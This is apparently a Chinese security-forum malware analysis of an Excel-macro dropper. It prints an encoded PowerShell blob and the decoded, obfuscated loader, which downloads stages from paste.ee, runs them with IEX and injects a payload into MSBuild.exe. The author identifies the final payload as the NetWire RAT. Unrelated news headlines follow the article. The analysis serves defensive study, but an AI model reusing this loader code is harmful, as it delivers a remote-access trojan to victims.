QBVAGIAagBjAEkAcwAnADsADQAKACQAVwBHAGcAcgBkAFYAbQBnAD0AIAAkAFcARwBnAHIAZABWAG0AZwAgACsAIAAxADsAJABWAFYAZgBPAEwAYQBHAGgAYwBOAGYARQBSAEUAdABpAEQAZgBvAFkATgBoAHgAaABDAFUAWgB0AE8AeABXAE0AQwBiAFAAUgBoAEkAZQBEAIAA9ACAAJwB5AFoAVgBNAE0AYQBiAHQAZwB3AFQAVABrAG4AWQB4AEwAcgBBAE4AVABlAHIAVABDAHAAbwBjAEIAdgAnADsADQAKACQAVwBHAGcAcgBkAFYAbQBnAD0AIAAkAFcARwBnAHIAZABWAG0AZwAgACsAIAAxADsAfQANAAoARgB1AG4AYwB0AGkAbwBuACAAbwB2AHEAcgBtAFMAawB5AHgAUgBQAE8AbQB1AFEAeQBRAGMAcgBzAGsAbwBRAEcATABQAGEASABUAEwAdgBxAFIAQQBWAEYATwBCAGwAewAgAHAAYQByAGEAbQAoACQAQgBYAGUAIAAsACAAJABYAEwAcQBIAHoAUgBWAFEAWgBzAGkAcgBjAHQAagB4AG0AbQBuAFAAVABpAEMASwBXAGwAegByAGwAdgAgACwAIAAkAHYARgBFAEEAbQBVAGsAQgB2AHgATwBTAGIAVAB5AEwAaQAgACwAIAAkAHkATwBPAGsATwBQAG8ASgBnAGsATgBTAGQAZgBkAFoAIAAsACAAJABsAFkAcwB4AGMAQwBrAHIAUwBGAFEAYgBxAFkAWgBRAFoAbgBnAEUASwBxAG8ATABkAG8AegBvAGMAVABpAG8AQgAgACwAIAAkAE0AbgBxAFYAVgBNAGQAcwB3AEsAWQBoAHAATQBMARABzAHcAVgBjAHYAagBnAFQAbwBEAHcAIAAsACAAJAB5AFcAYwBaAEsATABsAGEARQBSAFUAYgBTAHUAIAAsACAAJABuAHYAeQBtAEEAWgBRAHEAcgBnAEUAUgBEAEoAQgBoAEoAaABkAHkAbgB3AEkAZgBCAEIAIAAsACAAJAB6AGEAYwB1AEsAQQBGAHMAWQBxAFEAdwBwAGkAZwBrAHMARgB0AGkAUQBEAGsATAApAA0ACgAkAGYAeABzAFIAUgBXAEcATABkAGoAQQBhAHQAVABKAEEAZgBrAGcAWABzACAAPQAgACcAZQBsAFYAWQB4AG0AWQBMAGoAUAByAFQATQBuAHYAegBvAHAASgBQAGUAagBMAFYAeAAnADsADQAKACQAcQBWAFoAZQBWAE8AZgBDAFMARwB2AHMAWQBUAG0AUgBBAGsAagBaAEgAVgBFAGcAdgByAE4AZAB5AHYAWgBBAGIAegB2AEQAbQBFAHUAZABvAEoAIAA9ACAAJwBwAEQAdwBRAHAAYwBOAGoAYQBtAFgAcQBWAFEAdABqAGQAQQAnADsADQAKACQARQBYAGcAIAA9ACAAJwBSAFkAWABpAGUAdgBxAEcAbAB4AEEAUABjAHoAYQBZAEEAbABMAHkATgBFAEoAYQBuAHQAVgBRAGMAbQBGAHgASQBIAGYAcwBSAHUAaQBuACcAOwANAAoAJABmAG0AcwBVAEIAUQBrAEQAYwBCAFQATABoAGgATQBQAHgAdgBsAGEAYQBkAHkAcwBEAEcAVQBUAGkARwBGACAAPQAgACcAWQBPAGkAUgAnADsADQAKACQARgBsAGMAbABNAEEAawBsAGwAYgBhAFMAYwBVACAAPQAgACcAdwBNAEoAQwBEAUgB2AHYAUQBVAFYAdgBRAG0AUwB6AHYAegBzAEoASgBwAE4AZABPAEcAUgBlAHUAQgBHAG0ARwBHAE0ARgBmAGUAUABvAHEAZwAnADsADQAKACQAcwBlAG8AVgB5AEkAYQBYAGMAYgBxAG4AVwB3AFoAWgB0AHoAIAA9ACAAJwBCAE8ATwBqAHAASwBhAE4AVABRAGoARQBTAGMAVgAnADsADQAKACQAeQBaAGwAVABXAFQAZQBkAEsAUQBTAHAASgBHAEYAVwBvAFoAZgAgAD0AIAAnAGQAdgB6AEsAWQB1ACcAOwANAAoAJABHAHQAWABYAEwAQgBhACAAPQAgACcAegBIAGcAdQBoAGsAbABaAFoAcgBsAEUATgBLAE4AUAB0AHcAUABzAEQAWgBiACcAOwANAAoAJABiAE4AWABrAG0AcwBIAG4AaQBmAEYAUABIAGYAeQBVAHIAVwBhAFMAbQBwAHMAdwBnAEgAZQBPAG0AaQBYAGEAZwBsAFMAVABOAEIAbQAgAD0AIAAnAGsAeABXAGkARQB4AEgATgB5AHUAQQBoAHoASQBJAG0AVQBiAEQAZgBPAHQAQgBBAEgAZgBpAFcAJwA7AA0ACgAkAGUASABxAGsAdQBpAG8AVABLAHIAaQBBACAAPQAgACcAUQByAGgAcQBhAFgAZABnAHoAbQB4AEcAUgByAHcAJwA7AA0ACgAkAGEAWgBQAGwAQQBUAG4ASgB4AEYAWgBUAFMASgBqAFYAZgB5AGMAIAA9ACAAJwBTAFIARgBLAHQAZwBlAFYAcwAnADsADQAKACQAYwByAHIAeABrAFMAVABPAFAAdwBFAFkAcwBWAHkASgBOAHEAQwBjAGIAUwBPAG4ARAAgAD0AIAAnAFUARQBzAFUAbwBTAFIAVQAnADsADQAKACQAaQBiAFYAWQBSAEMAUQBqAGYARQB1AFkAagBNAGoAUwBvAFMAUQBCAEoAYwBEAHQAYwAgAD0AIAAnAE8AVwB1AEkAbQBHAFkAcwBQAGgAcwBSAGsAWgBMAGoAagBqAEoAagBrAHIASgBDAEEAegBBAFQAUwBGAFgAYgB3AFQAbgB1AHAAWABTAG4AQQByACcAOwANAAoAJABCAFoAWABpAHEAcABhAHQAVQBrAHMATgBYAE0AcwBJAG4ARwBGAFoASgBKAFIAVQBRAG0AUQB1AEwAUgBWAGoAdAB1AEgAYwBjAFEASgBkAHMAIAA9ACAAJwBEAHIARABHAFEAaAB3AFAAZQBoAHUAJwA7AA0ACgB9AA0ACgAkAG4AcgBJAEMAUgBFAFkAZwBoAEQATwBKAFUAYwBGAFAAIAA9ACAAJwBXAHcAYwBoAHgARwBhAFEASwBWAGoAeAB3AG0AbwBvAGIASABQAFUAYQB6AEYARQBMAGUAegAnADsADQAKAEYAdQBuAGMAdABpAG8AbgAgAGoASABmAE8AVgBtAEEAdQBBAFIAbQBrAHEASQBBAHgATQBHAEgAawBVAFYAYgBBAHsAIABwAGEAcgBhAG0AKAAkAHUAbABuAGIAaABrAEkAawBTAGoAcABsAGgAbABHAGkAcABqAGwAUgBaAFUAcwBWAHAAIAAsACAAJABFAFgAcgBYAFYAVABIAHgAVwBZAGkASABRAE0AZQBEAFcAcgBSAGUAbQBvAHMAVwBPAGMAcwBoAEMAWgB0AFMAbQBsAGYAbAB0AHUATwBXACAALAAgACQAawBQAGkAQQBoAFMAWQBuAFcAeQBBAEQATABJAFAAZQBVAEkAdABhAFoAdQB3AGYAUAAgACwAIAAkAGUAaAB0AEoAYwBkAHYAQgBDAFoASwBXAGcASgBUAHUAZwBiAHMAIAAsACAAJABhAGQAUABHAFoAbABWAHYARABwAFMAQwBsACAALAAgACQAbwByAHUATQBXAFcASQBLAEcAcQBVAHkAKQANAAoAJABGAFcARwBRAFcAWgBtAGIASgBsAG8AWQBiAHgAUABrAFIAbgAgAD0AIAAnAEgAYwBmAE4ASQBNAHQAagBNAE4ASABPAGYAZQB0AFAAUQB1AGUAZQBzAEEASQAnADsADQAKACQAWABMAFkAbABKAHIAQQBDAGgAQgBzAHIAWgBJAHgARQBkAHAAWgBOAEMAWABJAHUAaABoAHoAcAAgAD0AIAAnAEoAaABIAFQAeQBxAHcAbgBJAGEAVQBNAEUAZwBkAGwAQwBwAEkAdwBaAEIAQwBhAHUAZgB6AEQAZQBFAGIAcwBLAE8AJwA7AA0ACgAkAFQAbABZAGIAUgBCAFEAVQBQAEYAQgB4AHEAZQBJAGYAcwBxAHMATgBJACAAPQAgACcAaABZAFQAcgB0AEkARQB5AGIAQwBxAEoASwBBAGQATwByAHYASgBnAG4AVQB0AGgASgBZACcAOwANAAoAJABZAGoAQgBSAEEAUABvAEUAegBJAFoASQBIAFEAUQBkAHoARwBoACAAPQAgACcASQBCAGUAegB4AEUAYwByAE0AZQBsAGkAVQBtAGYAUABhAGsAJwA7AA0ACgB9AA0ACgAkAHIAZQBnACAAPQAgACgAJwB7ADIAfQB7ADAAfQB7ADEAfQB7ADMAfQAnAC0AZgAnAGQAUwB0ACcALAAnAHIAaQBuACcALAAcIGAARABgAG8AYAB3AG4AYABsAGAAbwBhAB0gLAAnAGcAJwApADsAWwB2AG8AaQBkAF0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAFcAaQB0AGgAUABhAHIAdABpAGEAbABOAGEAbQBlACgAJwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAnACkAOwAkAGYAagA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AZQA0ADkAdQAwACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAEAAQAAiACwAIAAiADQANAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAgACIANwA4ACIAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBkAGwATwBNAHoAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAawAgAYQBjAGsAaQB0AHUAcABdADoAOgBlAHgAZQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA= | &('I'+'EX')

进一步解码得到，解混淆后的PowerShell脚本内容。

仔细阅读脚本内容后，发现前面是垃圾代码与增加延时，最后是通过调用CallByName下载下一阶段内容执行。

地址//paste.ee/r/e49u0，//paste.ee/r/dlOMz。

Function ZhZg{ param($xIxfmTFLHvQRN , $GPtEltKSlSBIDwArOphrhFygxx , $qfjydzoRxRgPADeXfddPJKQhakVwARMHovTnCTXIPf)$DiSCThogPCXterQgFZbEkrVLGUAeHqzAD = 'tSyJnGHnXzweeXOWUIycCLNHwyhKY';$CWpvyyivlUxxUVObqdPlWq = 'bfi';$rMoZw = 'yxapiZPoYWefF';$rsVIEumCLUOQPuqjwvAiVYomHDAxyTXwZrMy = 'gVBbwlGbSJVxoajeWVTDiBAupDrwRqXhsrQZy';$YmiLoue = 'Jt';$RCWtvJeVHmstJJbloFxJJgQwgVWMGQpuyH = 'oB';}$ximErUgtYCNIquMkflmZMZmROrwyvCInjA = 'OXEovQnx';If ('zxZuiObPBcbXwUpzYi' -eq 'VtaYqmxMbwrJZcRSRRBPgatlHYkSCOoXhobbYZjHkB') {$SK = 'CveCYiWSRvzoQRCfK';$HTbkAqtrhuff = 'bbpVpoApGBPWfbjIRFFqnLq';$SunIhAcnlVYNbwNrJXASMNVPJiQoaomPkxDu = 'sI';$YclKCW = 'UsNgQKXeEZYyyknMwiIcdtSrROvt';$cKMnBvwMIWFMTyVbtKVlPobutDbZWOB = 'dubOMKwpqAoLDP';$vwPYEaIUoi = 'txTXptVqiYWHOiNf';}$PzQqetgcHqxoVanfuRyVTKvqMglYpApquOEpSaP = 'nuiCX';DO{$ZbtSLTmpNgYbknzltwSwgGbBQHGdk = 'APUbBdKGSdURaa';$gJTVMTXjxBSzrCDMJFygIGIlW = 'ndobOgBYkxnHXvdgXZidSDP';$LMbtUZAhzlgtuVnm = 'TSGZBhDCcjiDsIjOXQCEIEKwFIlPjlBmvfzlIsJeYr';$qSeGdxeXFkipPHJTswnSrhwHNJxFeGYgQMTeb = 'ISF';$wBNpjezYQikY = 'JV';$sTzYtyMBZDnerqnVNdku = 'XZTGFqqvsLKIFJoSgUyoLQgqVhauOKWYbcUugSn';$Nyi= $Nyi + 1;} While ($Nyi -ne 6)While ($WGgrdVmg -ne 6) {$DgJmFiHtclYPvgholhcoulNhqSFkoNzutuLdNmVuNBD = 'OsaZyCsoJsFRTcvncXEPleWBVEbyL';$WGgrdVmg= $WGgrdVmg + 1;$atifTxrflmVLkAptKkriRqwowjWZD = 'atcbRLjnJxvxlSuatVLctrHdRkwtjjbSbrLbiJj';$WGgrdVmg= $WGgrdVmg + 1;$JWbtmTEetVqAObAjmzJgPpDZWd = 'tHSrkmhSWPNqxfRzOtb';$WGgrdVmg= $WGgrdVmg + 1;$zrbp = 'zCOUTBXJyLXbdFOhJdUYIMAyqpgvZV';$WGgrdVmg= $WGgrdVmg + 1;$fdI = 'jTyDNqgyUuYknMWqNHQanBQdeUbjcIs';$WGgrdVmg= $WGgrdVmg + 1;$VVfOLaGhcNfEREtiDfoYNhxhCUZtOxWMCbPRhIenA = 'yZVMMabtgwTTknYxLrANTerTCpocBv';$WGgrdVmg= $WGgrdVmg + 1;}

Function ovqrmSkyxRPOmuQyQcrskoQGLPaHTLvqRAVFOBl{ param($BXe , $XLqHzRVQZsirctjxmmnPTiCKWlzrlv , $vFEAmUkBvxOSbTyLi , $yOOkOPoJgkNSdfdZ , $lYsxcCkrSFQbqYZQZngEKqoLdozocTioB , $MnqVVMdswKYhpMnCDswVcvjgToDw , $yWcZKLlaERUbSu , $nvymAZQqrgERDJBhJhdynwIfBB , $zacuKAFsYqQwpigksFtiQDkL)

$fxsRRWGLdjAatTJAfkgXs = 'elVYxmYLjPrTMnvzopJPejLVx';$qVZeVOfCSGvsYTmRAkjZHVEgvrNdyvZAbzvDmEudoJ = 'pDwQpcNjamXqVQtjdA';$EXg = 'RYXievqGlxAPczaYAlLyNEJantVQcmFxIHfsRuin';$fmsUBQkDcBTLhhMPxvlaadysDGUTiGF = 'YOiR';$FlclMAkllbaScU = 'wMJCnARvvQUVvQmSzvzsJJpNdOGReuBGmGGMFfePoqg';$seoVyIaXcbqnWwZZtz = 'BOOjpKaNTQjEScV';$yZlTWTedKQSpJGFWoZf = 'dvzKYu';$GtXXLBa = 'zHguhklZZrlENKNPtwPsDZb';$bNXkmsHnifFPHfyUrWaSmpswgHeOmiXaglSTNBm = 'kxWiExHNyuAhzIImUbDfOtBAHfiW';$eHqkuioTKriA = 'QrhqaXdgzmxGRrw';$aZPlATnJxFZTSJjVfyc = 'SRFKtgeVs';$crrxkSTOPwEYsVyJNqCcbSOnD = 'UEsUoSRU';$ibVYRCQjfEuYjMjSoSQBJcDtc = 'OWuImGYsPhsRkZLjjjJjkrJCAzATSFXbwTnupXSnAr';$BZXiqpatUksNXMsInGFZJJRUQmQuLRVjtuHccQJds = 'DrDGQhwPehu';}$nrICREYghDOJUcFP = 'WwchxGaQKVjxwmoobHPUazFELez';

Function jHfOVmAuARmkqIAxMGHkUVbA{ param($ulnbhkIkSjplhlGipjlRZUsVp , $EXrXVTHxWYiHQMeDWrRemosWOcshCZtSmlfltuOW , $kPiAhSYnWyADLIPeUItaZuwfP , $ehtJcdvBCZKWgJTugbs , $adPGZlVvDpSCl , $oruMWWIKGqUy)

$FWGQWZmbJloYbxPkRn = 'HcfNIMtjMNHOfetPQueesAI';$XLYlJrAChBsrZIxEdpZNCXIuhhzp = 'JhHTyqwnIaUMEgdlCpIwZBCaufzDeEbsKO';$TlYbRBQUPFBxqeIfsqsNI = 'hYTrtIEybCqJKAdOrvJgnUthJY';$YjBRAPoEzIZIHQQdzGh = 'IBezxEcrMeliUmfPak';}$reg = ('{2}{0}{1}{3}'-f'dSt','rin', `D`o`wn`l`oa ,'g');[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');

$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object  `N`e`T`.`W`e`B`C`l`i`e`N`T ),$reg,[Microsoft.VisualBasic.CallType]::Method,'htt'+[Char]80+'' + [Char]58 + '//paste.ee/r/e49u0').Replace("@@", "44").Replace("!", "78")|IEX;

[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object  `N`e`T`.`W`e`B`C`l`i`e`N`T ),$reg,[Microsoft.VisualBasic.CallType]::Method,'htt'+[Char]80+'s' + [Char]58 + '//paste.ee/r/dlOMz').replace('$$','0x')|IEX;

[k.Hackitup]::exe('MSBuild.exe',$f)

下载到第一个经解码后的文件，不过是已经经过处理得到的dll文件。

实际名称为Hackitup，如下可大致判断出后续会进行进程注入，结合上述的解码脚本内容，可发现注入的进程为MSBuild.exe。

下载到第二个文件，简单分析为NetWire RAT远控木马。

C2肯定已经失效了，但是也贴一下吧。

参考链接

https://www.virustotal.com/gui/file/67fd76d01ab06d4e9890b8a18625436fa92a6d0779a3fe111ca13fcd1fe68cb2/details
https://app.any.run/tasks/b37be5b0-1460-4dd1-992e-72ec74cec8fe/
https://app.any.run/tasks/25084eac-2823-4887-8f90-42623b01c2ae/
https://app.any.run/tasks/0ddc9dc1-0ff9-43c7-b456-35a296998809/
https://www.freebuf.com/articles/others-articles/236919.html
https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/
https://zeronohacker.com/analysis-excel-4-0-marco-from-field-office-sample.html
https://www.jianshu.com/p/d2bab95ec62c

- End -

看雪ID：jishuzhain

https://bbs.pediy.com/user-678001.htm

*本文由看雪论坛 jishuzhain 原创，转载请注明来自看雪社区。

高三女生醉酒后被强奸致死？检方回应

高三女生醉酒后被强奸致死？检方回应

那些内心强大的孩子，童年被允许做过这1件事

波罗的海，电缆断裂！

关晓彤突然官宣喜讯！粉丝欢呼：恭喜啊，终于等到这一天